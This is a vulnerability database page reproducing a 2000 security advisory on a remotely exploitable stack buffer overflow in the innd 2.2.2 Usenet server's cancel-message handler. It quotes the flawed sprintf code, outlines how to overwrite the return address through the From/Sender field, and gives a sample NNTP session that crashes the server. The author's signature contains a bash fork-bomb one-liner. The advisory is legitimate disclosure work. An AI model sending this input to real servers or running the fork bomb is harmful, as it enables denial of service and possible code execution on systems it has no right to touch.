Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

innd-2.2.2.txt

🗓️ 06 Jun 2000 00:00:00Reported by Michal ZalewskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Innd 2.2.2 contains exploitable buffer overflow in control articles handler potentially allowing exploitation.

Code
`  
  
Newest innd 2.2.2, probably the most popular usenet news server (as well  
as previous versions) contain remotely exploitable, trivial on-stack  
buffer overflow in control articles handler.  
  
Offending piece of code (in innd/art.c, function ARTcancelverify):  
  
if (!EQ(local, p)) {  
files = NULL;  
(void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",  
p, MessageID, local);  
ARTlog(Data, ART_REJECT, buff);  
}  
  
Where buff (local stack buffer) is SMBUF bytes long (it means, 256 bytes),  
but MessageID can be up to 1000 almost bytes long. This code is reached  
when cancel request is sent to special newsgroup (called 'control'), and  
cancel request contains valid Message-ID, but From/Sender fields are  
different in cancel request and in original posting.  
  
How to exploit it? It could be a problem for script kiddies, as Message-ID  
is strictly checked for non-printable characters etc. But hey, Message-ID  
can be used only as a padding, and then we can overwrite return address  
with From/Sender address of cancel post! This field is not verified in any  
fascist way. Shellcode? Can be placed anywhere, quite big portions of  
cancel post are lying in the accessible memory when overflow happens.  
  
Sample input ("LONGBUFFER" = around 500-600 bytes of AAAs..., has to be  
the same every time):  
  
-- input -  
201 XXX InterNetNews NNRP server INN 2.2 23-Oct-1998 ready (posting ok)  
mode reader  
group pl.test  
post  
Message-ID: <none@LONGBUFFER>  
From: <[email protected]>  
Sender: <[email protected]>  
Newsgroups: pl.test  
  
testing  
. <- single dot, comment to avoid mail transfer problems  
group control  
post  
Message-ID: <[email protected]>  
Approved: <[email protected]>  
From: <[email protected]>  
Sender: <[email protected]>  
Control: cancel <none@LONGBUFFER>  
Subject: cmsg cancel <none@LONGBUFFER>  
Newsgroups: control  
  
Damn, cancel it.  
. <- single dot  
quit  
-- EOF --  
  
If innd/nnrp is running under debugger like strace, you'll see that   
child process responsible for request handling dies with SIGSEGV. Nice.  
  
  
_______________________________________________________  
Michal Zalewski [[email protected]] [tp.internet/security]  
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:  
=-----=> God is real, unless declared integer. <=-----=  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jun 2000 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow security vulnerability exploitable code message-id cancel request control articles
19